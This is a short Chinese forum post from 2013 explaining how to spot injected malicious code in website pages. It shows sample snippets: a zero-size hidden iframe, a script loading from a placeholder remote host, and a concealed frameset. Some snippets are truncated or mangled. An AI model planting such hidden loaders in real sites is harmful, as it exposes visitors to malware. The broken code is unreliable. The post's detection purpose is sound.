老榕树建站软件 发表于 2013-7-27 09:47:47

如何查看网站是否被挂马?

本帖最后由 老榕树建站软件 于 2013-7-27 09:50 编辑

网页被挂码的时候,HTML会混乱,造成前台首页参差不齐,被挂网页的网码一般有以下四种:
一:<iframe src="网马的地址" width="0" height="0" frameborder="0"></iframe>,“width="0" height="0" frameborder="0"就是大小高度的意思”这样被挂马的网页上就不会显示出来。
二:脚本挂马
<SCRIPT language=javascript>
window.open("
三:这一点就是比较隐蔽的那就是使用js文件,代码如下:
<script language="javascript" src="</script'>http://xxxxxxx.net/mm.js"></script>这种呢,是很难发现被挂码,但是容易造成HTML混乱
四:再一种代码就是调用其他网页的页面文件,可以将下面的代码复制,保存为HTM文件,代码如下:
<frameset rows="444,0" cols="*">
<frame src="/index.htm" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="help.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
   以上是被挂码的时候网页上会存在以上代码,那如果在检查网页是否被挂马时看到这些代码就可以证明有无挂马的现象了,发现网页被挂马就把以上代码中的任一代码删除然后保存即可。
页: [1]
查看完整版本: 如何查看网站是否被挂马?